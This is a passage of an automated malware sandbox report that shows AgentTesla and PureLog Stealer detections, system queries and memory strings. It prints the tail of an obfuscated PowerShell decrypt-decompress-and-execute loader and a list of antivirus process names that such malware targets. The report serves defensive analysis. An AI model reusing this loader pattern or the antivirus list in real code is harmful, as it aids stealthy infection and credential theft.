$ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw \| powershell -			Jump to behavior

Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q8<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}TH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q9<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}rTH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q3<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	19_2_02985A90
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetLocaleInfoA,	19_2_0298A780
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetLocaleInfoA,	19_2_0298A7CC
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	19_2_02985B9C
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	19_2_029A5FA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: GetLocaleInfoA,	23_2_00417A20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: GetLocaleInfoA,	23_1_00417A20
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_028BD5D0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	24_2_028A5A90
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: GetLocaleInfoA,	24_2_028AA7CC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	24_2_028A5B9B
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_028C5F9F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: GetLocaleInfoA,	25_2_00417A20

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_029891C8 GetLocalTime,

19_2_029891C8

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_0298B748 GetVersionExA,

19_2_0298B748

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
